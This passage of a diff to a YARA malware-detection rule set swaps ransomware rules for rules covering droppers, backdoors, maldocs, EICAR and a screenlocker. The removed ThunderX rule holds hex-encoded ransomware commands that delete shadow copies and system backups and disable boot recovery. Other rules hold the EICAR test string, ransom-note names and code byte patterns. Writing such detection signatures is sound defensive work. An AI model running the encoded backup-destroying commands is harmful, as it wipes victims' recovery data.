8????????8B??????52E8????????8D??????50E8????????8B????52E8????????5A5052E8????????5850E8????????5A01??EB??E8????????66????????FF????E8????????FF??????E8????????83????C331??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????555331??50505050E8????????C7??????????????FF??????E8????????89????8B????21??75??31??EB??8D??????50FF??????FF??????68????????E8????????89??21??75??8B????FF????5889??????68????????68????????FF??????E8????????FF????E8????????8B??????EB??31??83????5B5DC35331??50505050E8????????8B??????8D????E8????????FF????E8????????89??????8B??????83????53E8????????89??????83????????74??68????????FF??????FF??????FF??????E8????????21??74??FF??????FF??????68????????E8????????89??F7??89??????FF??????E8????????8B??????EB??31??FF????E8????????83????5BC2????31??50E8????????83????????????74??FF??????????5889????FF??????FF??????FF??????FF??????FF??????FF??????EB??EB??B8????????EB??31??83????C2????5553BA????????83????C7????????????4A75??E8????????8B??????8D????E8????????FF????8D??????????59E8????????74??31??E9????????52E8????????5A50FF??????????8D??????????50E8????????8B??????52E8????????8D??????50E8????????FF??????E8????????89??01??89??????8B??????83????53E8????????89??????83????????0F84????????68????????68????????FF??????FF??????E8????????89??3B??????0F85????????FF??????8D??????5866??????8B??????83????535866??????FF??????5889????C7??????????????8D??????????8D??????E8????????8D??????C7????????????C7????????????8D??????505889????68????????68????????8D??????508D??????5068????????8D??????50E8????????89??21??75??8B??????21??7E??B8????????EB??31??21??74??FF??????E8????????C7??????????????68????????68????????8D??????508D??????50FF??????E8????????89??21??75??8D??????FF????5889??????FF??????E8????????8B??????21??7E??FF??????E8????????8B??????EB??31??FF??????E8????????FF????E8????????83????5B5DC2????555357BA????????83????C7???????????? }
+		$string0 = "msn.klm"
+		$string1 = "wmsn.klm"
+		$string2 = "bms.klm"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		all of them
 }
-
-rule TRELLIX_ARC_Ransom_Tunderx : RANSOMWARE FILE
+rule TRELLIX_ARC_Dropper_Demekaf_Pdb : DROPPER FILE
 {
 	meta:
-		description = "Rule to detect tthe ThunderX ransomware family"
-		author = "McAfee ATR team"
-		id = "cf5ecd0c-db26-5fe4-a056-b5c1ca3b1d34"
-		date = "2020-09-14"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_ThunderX.yar#L3-L45"
+		description = "Rule to detect Demekaf dropper based on PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "b49f42c1-d737-5afa-b547-7268e4cde360"
+		date = "2011-03-26"
+		modified = "2020-08-14"
+		reference = "https://v.virscan.org/Trojan-Dropper.Win32.Demekaf.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_dropper_demekaf_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "f870616c4a35239a01129daad5f12469b2df39251ee4bc9fbeb5523f00231ece"
+		hash = "fab320fceb38ba2c5398debdc828a413a41672ce9745afc0d348a0e96c5de56e"
+		logic_hash = "89c0c1da1f8997b12a446c93bbde200e62fac9cab2a9a17147b268d435bdc3b6"
 		score = 75
-		quality = 68
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "DROPPER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/ThunderX"
+		malware_type = "dropper"
+		malware_family = "Dropper:W32/Demekaf"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "7bab5dedef124803668580a59b6bf3c53cc31150d19591567397bbc131b9ccb6"
-		hash2 = "0fbfdb8340108fafaca4c5ff4d3c9f9a2296efeb9ae89fcd9210e3d4c7239666"
-		hash3 = "7527459500109b3bb48665236c5c5cb2ec71ba789867ad2b6417b38b9a46615e"
 
 	strings:
-		$pattern1 = "626364656469742E657865202F736574207B64656661756C747D20626F6F74737461747573706F6C6963792069676E6F7265616C6C6661696C75726573"
-		$s3 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550202D64656C6574654F6C64657374" ascii
-		$s4 = "626364656469742E657865202F736574207B64656661756C747D207265636F76657279656E61626C6564204E6F" ascii
-		$s5 = "776261646D696E2044454C4554452053595354454D53544154454241434B5550" ascii
-		$s6 = "433A5C50726F6772616D2046696C65732028783836295C4D6963726F736F66742053514C20536572766572" ascii
-		$s7 = "476C6F62616C5C33353335354641352D303745392D343238422D423541352D314338384341423242343838" ascii
-		$s8 = "433A5C50726F6772616D2046696C65735C4D6963726F736F66742053514C20536572766572" ascii
-		$s9 = "76737361646D696E2E6578652044656C65746520536861646F7773202F416C6C202F5175696574" ascii
-		$s10 = "776D69632E65786520534841444F57434F5059202F6E6F696E746572616374697665" ascii
-		$s11 = "534F4654574152455C4D6963726F736F66745C45524944" ascii
-		$s12 = "AppPolicyGetProcessTerminationMethod" fullword ascii
-		$s13 = "7B5041545445524E5F49447D" ascii
-		$s14 = "726561646D652E747874" ascii
-		$s15 = "226E6574776F726B223A22" ascii
-		$s16 = "227375626964223A22" ascii
-		$s17 = "226C616E67223A22" ascii
-		$s18 = "22657874223A22" ascii
-		$s19 = "69642E6B6579" ascii
-		$s20 = "7B5549447D" ascii
-		$seq0 = { eb 34 66 0f 12 0d 10 c4 41 00 f2 0f 59 c1 ba cc }
-		$seq1 = { 6a 07 50 e8 51 ff ff ff 8d 86 d0 }
-		$seq2 = { ff 15 34 81 41 00 eb 15 83 f8 fc 75 10 8b 45 f4 }
+		$pdb = "\\vc\\res\\fake1.19-jpg\\fake\\Release\\fake.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "ea7e408cd2a264fd13492973e97d8d70" and $pattern1 and 4 of them ) and all of ( $seq* ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-rule TRELLIX_ARC_RANSOM_Exorcist : RANSOMWARE FILE
+rule TRELLIX_ARC_Malw_Eicar : EICAR
 {
 	meta:
-		description = "Rule to detect Exorcist"
-		author = "McAfee ATR Team"
-		id = "38ab069d-b030-5459-a42f-7ecd5963e68f"
-		date = "2020-09-01"
-		modified = "2020-10-12"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Exorcist.yar#L1-L25"
+		description = "Rule to detect the EICAR pattern"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "16307b03-7fab-5d68-ad3b-0efcea952fcf"
+		date = "2026-03-01"
+		modified = "2020-08-14"
+		reference = "https://www.eicar.org/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Eicar.yar#L1-L22"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "c376382e60aae0f661151495097d3d93f185faebb11781dbf083324c23a07247"
+		hash = "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
+		logic_hash = "564b0592f40582fe71e2dab0c0f25c168462f9297c13e7c9f06ac51b492e4533"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
-		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransomware:W32/Exorcist"
-		actor_type = "Cybercrime"
-		hash1 = "793dcc731fa2c6f7406fd52c7ac43926ac23e39badce09677128cce0192e19b0"
-		actor_type = "Cybercrime"
+		tags = "EICAR"
+		malware_type = "eicar"
+		malware_family = "W32/Eicar"
+		actor_type = "Unknown"
 		actor_group = "Unknown"
 
 	strings:
-		$sq1 = { 48 8B C4 48 89 58 08 48 89 70 10 48 89 78 18 4C 89 60 20 55 41 56 41 57 48 8D 68 A1 48 81 EC 90 00 00 00 49 8B F1 49 8B F8 4C 8B FA 48 8B D9 E8 ?? ?? ?? ?? 45 33 E4 85 C0 0F 85 B1 00 00 00 48 8B D7 48 8B CB E8 9E 02 00 00 85 C0 0F 85 9E 00 00 00 33 D2 48 8B CB E8 ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 45 8D 44 24 01 48 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB 48 8B F8 FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 E8 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 4C 8B F0 48 8D 48 FF 48 83 F9 FD 77 25 48 8D 55 2F 48 8B C8 FF 15 ?? ?? ?? ?? 4C 39 65 2F 75 3B 49 8B CE FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 4C 8D 9C 24 90 00 00 00 49 8B 5B 20 49 8B 73 28 49 8B 7B 30 4D 8B 63 38 49 8B E3 41 5F 41 5E 5D C3 48 8D 45 FB 4C 89 65 1F 4C 8D 4D FF 48 89 44 24 20 4C 8B C6 4C 89 65 07 48 8D 55 07 4C 89 65 FF 48 8D 4D 1F 44 89 65 FB E8 ?? ?? ?? ?? 45 33 C9 4C 8D 05 3C F5 FF FF 49 8B D7 49 8B CE FF 15 ?? ?? ?? ?? 48 8D 55 17 49 8B CE FF 15 ?? ?? ?? ?? 49 8B CE 44 89 65 F7 E8 ?? ?? ?? ?? 49 8B F4 4C 89 65 0F 4C 39 65 17 0F 8E 9D 00 00 00 C1 E0 10 44 8B F8 F0 FF 45 F7 B9 50 00 00 00 E8 ?? ?? ?? ?? 8B 4D 13 48 8B D8 89 48 14 89 70 10 4C 89 60 18 44 89 60 28 4C 89 70 30 48 8B 4D 07 48 89 48 48 48 8D 45 F7 B9 00 00 01 00 48 89 43 40 E8 ?? ?? ?? ?? 33 D2 48 89 43 20 41 B8 00 00 01 00 48 8B C8 E8 ?? ?? ?? ?? 48 8B 53 20 4C 8D 4B 38 41 B8 00 00 01 00 48 89 5C 24 20 49 8B CE FF 15 ?? ?? ?? ?? EB 08 33 C9 FF 15 ?? ?? ?? ?? 8B 45 F7 3D E8 03 00 00 77 EE 49 03 F7 48 89 75 0F 48 3B 75 17 0F 8C 6B FF FF FF EB 03 8B 45 F7 85 C0 74 0E 33 C9 FF 15 ?? ?? ?? ?? 44 39 65 F7 77 F2 48 8B 4D 07 E8 ?? ?? ?? ?? 48 8B 4D 1F 33 D2 E8 ?? ?? ?? ?? 49 8B CE FF 15 ?? ?? ?? ?? 4C 89 64 24 30 45 33 C9 C7 44 24 28 80 00 00 00 45 33 C0 BA 00 00 00 C0 C7 44 24 20 03 00 00 00 48 8B CF FF 15 ?? ?? ?? ?? 48 8B D8 48 8D 48 FF 48 83 F9 FD 77 51 48 8D 55 37 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 37 45 33 C9 45 33 C0 48 8B CB FF 15 ?? ?? ?? ?? 44 8B 45 FB 4C 8D 4D 27 48 8B 55 FF 48 8B CB 4C 89 64 24 20 FF 15 ?? ?? ?? ?? 48 8B 4D FF E8 ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? E9 14 FE FF FF 48 8B CF E8 ?? ?? ?? ?? 48 8B 4D FF E9 06 FE FF FF }
-		$sq2 = { 48 8B C4 48 81 EC 38 01 00 00 48 8D 50 08 C7 40 08 04 01 00 00 48 8D 4C 24 20 FF 15 ?? ?? ?? ?? 48 8D 4C 24 20 E8 ?? ?? ?? ?? 48 81 C4 38 01 00 00 C3 }
+		$s1 = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		any of them
 }
-rule TRELLIX_ARC_Pico_Ransomware : RANSOMWARE FILE
+rule TRELLIX_ARC_Havex_Backdoor_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Pico Ransomware"
+		description = "Rule to detect backdoor Havex based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "843cac7a-652e-5cbf-a09d-fb4b1eaa8481"
-		date = "2018-08-30"
+		id = "a667bb4e-8c38-59a6-8ae0-09c44961a687"
+		date = "2012-11-17"
 		modified = "2020-08-14"
-		reference = "https://twitter.com/siri_urz/status/1035138577934557184"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Pico.yar#L1-L37"
+		reference = "https://www.f-secure.com/v-descs/backdoor_w32_havex.shtml"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_havex_pdb.yar#L1-L26"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "cc4a9e410d38a29d0b6c19e79223b270e3a1c326b79c03bec73840b37778bc06"
-		logic_hash = "bb15e66504f393bcb4b173cb2a4ec65aa13110060f7fb70282330b5f6d72f5ed"
+		hash = "0f4046be5de15727e8ac786e54ad7230807d26ef86c3e8c0e997ea76ab3de255"
+		logic_hash = "dc50475b1ff2194306a0295f71860e4cc5ae7e126daa5d401b98cd2a0aadf1dd"
 		score = 75
-		quality = 20
-		tags = "RANSOMWARE, FILE"
+		quality = 70
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Pico"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Havex"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "C:\\Users\\rikfe\\Desktop\\Ransomware\\ThanatosSource\\Release\\Ransomware.pdb" fullword ascii
-		$s2 = "\\Downloads\\README.txt" fullword ascii
-		$s3 = "\\Music\\README.txt" fullword ascii
-		$s4 = "\\Videos\\README.txt" fullword ascii
-		$s5 = "\\Pictures\\README.txt" fullword ascii
-		$s6 = "\\Desktop\\README.txt" fullword ascii
-		$s7 = "\\Documents\\README.txt" fullword ascii
-		$s8 = "/c taskkill /im " fullword ascii
-		$s9 = "\\AppData\\Roaming\\" fullword ascii
-		$s10 = "gMozilla/5.0 (Windows NT 6.1) Thanatos/1.1" fullword wide
-		$s11 = "AppData\\Roaming" fullword ascii
-		$s12 = "\\Downloads" fullword ascii
-		$s13 = "operator co_await" fullword ascii
+		$pdb = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Phalanx-3d.ServerAgent.pdb"
+		$pdb1 = "\\Workspace\\PhalangX 3D\\Src\\Build\\Release\\Tmprovider.pdb"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 700KB ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
 }
-rule TRELLIX_ARC_Ransom_Xinof : RANSOMWARE FILE
+rule TRELLIX_ARC_Chikdos_Malware_Pdb : DOS FILE
 {
 	meta:
-		description = "Detect Xinof ransomware"
-		author = "Thomas Roccia | McAfee ATR team"
-		id = "3b064ce4-cd5b-5a4a-bb55-a2c2c361791e"
-		date = "2020-11-20"
-		modified = "2020-11-20"
-		reference = "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_xinof.yar#L53-L82"
+		description = "Chikdos PDB"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "0174ff2b-57fc-5578-b45e-c08bf8528ee8"
+		date = "2013-12-02"
+		modified = "2020-08-14"
+		reference = "http://hackermedicine.com/tag/trojan-chickdos/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_chickdos_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0c1e6299a2392239dbe7fead33ef4146"
-		logic_hash = "42110ee8869d56c53dc201cbc83652c6457541b8d502aa12b37ef6200e735a15"
+		hash = "c2a0e9f8e880ac22098d550a74940b1d81bc9fda06cebcf67f74782e55e9d9cc"
+		logic_hash = "150bf809a61aad00df0c49fb6a609b909c84ffb9ca442e143a6c5bf3dfc39314"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "DOS, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom/XINOF"
+		malware_type = "dos"
+		malware_family = "Dos:W32/ChickDos"
 		actor_type = "Cybercrime"
-		actor_group = "FONIX"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = "XINOF.exe" nocase ascii
-		$s2 = "C:\\Users\\Phoenix" nocase ascii
-		$s3 = "How To Decrypt Files.hta" nocase ascii
-		$s4 = "C:\\ProgramData\\norunanyway" nocase ascii
-		$s5 = "C:\\ProgramData\\clast" nocase ascii
-		$s6 = "fonix1" nocase ascii
-		$s7 = "C:\\Windows\\System32\\shatdown.exe" nocase ascii
-		$s8 = "XINOF Ransomw" nocase ascii
-		$s9 = "XINOF v4.2" nocase ascii
-		$s10 = "XINOF Ransomware Version 3.3" nocase ascii
+		$pdb = "\\IntergrateCHK\\Release\\IntergrateCHK.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and any of them
 }
-
-rule TRELLIX_ARC_Ransom_Egregor : RANSOMWARE FILE
+rule TRELLIX_ARC_Rtf_Bluetea_Builder : MALDOC FILE
 {
 	meta:
-		description = "Detect Egregor ransomware"
-		author = "Thomas Roccia | McAfee ATR team"
-		id = "b9f1a712-c168-5e0f-8b9e-cb03a6c43fc3"
-		date = "2020-10-28"
-		modified = "2020-10-28"
-		reference = "https://bazaar.abuse.ch/sample/004a2dc3ec7b98fa7fe6ae9c23a8b051ec30bcfcd2bc387c440c07ff5180fe9a/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_egregor.yar#L4-L31"
+		description = "Rule to detect the RTF files created to distribute BlueTea trojan"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "20e4f7b2-b36c-5724-a3aa-4216ed6265ab"
+		date = "2020-04-21"
+		modified = "2020-08-14"
+		reference = "https://blog.360totalsecurity.com/en/bluetea-action-drive-the-life-trojan-update-email-worm-module-and-spread-through-covid-19-outbreak/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALDOC_rtf_bluetea_builder.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5f9fcbdf7ad86583eb2bbcaa5741d88a"
-		logic_hash = "8077c656eed0b1633da54f8d017d4eff122f2f4e486c4e1af6f6434ea33c0675"
+		hash = "4a3eeaed22342967a95302a4f087b25f50d61314facc6791f756dcd113d4f277"
+		logic_hash = "6c4007fb7ef4819141db63050215dcbb3d2c17e7cdcdbb6cfb4f4b045bb5736b"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "MALDOC, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom/Egregor"
+		malware_type = "maldoc"
+		malware_family = "Maldoc:W32/BlueTea"
 		actor_type = "Cybercrime"
-		actor_group = "egregor"
+		actor_group = "Unknown"
 
 	strings:
-		$p1 = "ewdk.pdb" fullword ascii
-		$p2 = "testbuild.pdb" fullword ascii
-		$s1 = "M:\\" nocase ascii
-		$s2 = "1z1M9U9" fullword wide
-		$s3 = "C:\\Logmein\\{888-8888-9999}\\Logmein.log" fullword wide
+		$sequence = { 7B??72??6631??????65666C616E6731??32??????????69??????????????67????36??75??32??????656666????35????????656666????????73??666462????33??35????????74??68????????68????????36??73??73??66??????68????????36??73??73??6662????5C646566??616E6731??33??5C646566??616E67666532??35????????656D656C616E6731??33??5C74??656D656C616E67666532??35????????656D656C616E6763????7B??666F6E74??62??????6630??????69??????????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????6631??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??5C6633????6662????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??6120????74??3B????0A????6633??5C6662????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6633??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??5C2763????2763????2763????276535????????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??613B????5C6662????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????666C6F6D69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C666462????6E6F72??6633??35????????62????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??0A????66??????69????????????31??????????62????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6662????69????????????31??????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??6634??5C6662????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????5C6634??5C6662????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????0A????6634??5C6662????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??5C6634??5C6662????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??0A????6631??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C6633??30??????69??????????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????74??20????3B????5C6633??31??????69??????????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????74??20????72??7D??5C6633??33??????69??????????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????74??20????6565??????0D????????33??34??6662????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120????74??20??????3B????5C6633??375C6662????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????74??20????6C74??63??7D??5C6633??38??????69??????????????6D616E5C6663????72??6574??3633??????72??32??43616D62????6120????74??20??5669????????????73??29??7D??5C6634??30??????69??????????????69????????????6172??6574??33??5C6670??71??20????6C69????????????3B????0A????6634??31??????69??????????????69????????????6172??6574??30????6670??71??20????6C69????????????72??7D??5C6634??33??????69??????????????69????????????6172??6574??3631??????72??32??43616C69????????????6565??????7B??6634??34??6662????69??????????69????????????6172??6574??3632??????72??32??43616C69????????????72??7D??5C6634??375C6662????69??????????69????????????6172??6574??38??5C6670??71??20????6C69????????????6C74??63??7D??0A????6634??38??????69??????????????69????????????6172??6574??3633??????72??32??43616C69????????????69????????????73??29??7D??5C6634??32??????69??????????????6C5C6663????72??6574??5C6670??71??20????2763????2763????2763????276535????????74??72??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20??????6573??4E6577??526F6D616E20????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20??????6573??4E6577??526F6D616E20????72??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??5469????????????77??526F6D616E20????6565??????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??5469????????????77??526F6D616E20??????3B????0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??37375C6670??71??20??????6573??4E6577??526F6D616E20??486562????77??3B????5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3738??????72??32??5469????????????77??526F6D616E20??4172??62????29??7D??5C666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20??????6573??4E6577??526F6D616E20????6C74??63??7D??0A????666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3633??????72??32??5469????????????77??526F6D616E20??5669????????????73??29??7D??5C666462????6A??72??6633??35????????62????69??????????6C5C6663????72??6574??5C6670??71??20????6D5375??20????73??6572??7B??2A??????6C74??5369????????????7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??33??5C6670??71??20????6D62????6120????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??30????6670??71??20????6D62????6120????72??7D??5C66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3631??????72??32??43616D62????6120????6565??????7B??66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??3632??????72??32??43616D62????6120??????3B????0A????66??????616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??38??5C6670??71??20????6D62????6120????6C74??63??7D??5C66??????616A?? }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and hash.sha256 ( pe.rich_signature.clear_data ) == "b030ed1a7ca222a0923a59f321be7e55b8d0fc24c1134df1ba775bcf0994c79c" or ( pe.sections [ 4 ] . name == ".gfids" and pe.sections [ 5 ] . name == ".00cfg" ) and ( any of ( $p* ) or 2 of ( $s* ) )
+		uint16( 0 ) == 0x5c7b and filesize < 100KB and all of them
 }
-
-rule TRELLIX_ARC_Ransomware_Sodinokibi : RANSOMWARE FILE
+rule TRELLIX_ARC_Screenlocker_5H311_1Nj3C706 : SCREENLOCKER FILE
 {
 	meta:
-		description = "Using a recently disclosed vulnerability in Oracle WebLogic, criminals use it to install a new variant of ransomware called “Sodinokibi"
-		author = "Christiaan Beek | McAfee ATR team"
-		id = "573e3390-1ee5-5489-a67e-decc02aea7a0"
-		date = "2019-05-13"
-		modified = "2025-03-18"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L3-L30"
+		description = "Rule to detect the screenlocker 5h311_1nj3c706"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "50bbe8e1-4721-5277-b786-d2a2d9acf917"
+		date = "2018-08-07"
+		modified = "2020-08-14"
+		reference = "https://twitter.com/demonslay335/status/1038060120461266944"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_screenlocker_5h311_1nj3c706.yar#L1-L33"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "cb5d4e9a7cbec27d693ed73bab4be598614d7bd5ebd23d7907730571a4174be8"
+		hash = "016ee638bd4fccd5ca438c2e0abddc4b070f59269c08f11c5313ba9c37190718"
+		logic_hash = "61b4495841c77053ba2631f087197719f3ee45cd93add022f23b87ece8563619"
 		score = 75
 		quality = 70
-		tags = "RANSOMWARE, FILE"
+		tags = "SCREENLOCKER, FILE"
 		rule_version = "v1"
-		malware_type = "ransomware"
-		malware_family = "Ransom:W32/Sodinokibi"
+		malware_type = "screenlocker"
+		malware_family = "ScreenLocker:W32/5h311_1nj3c706"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
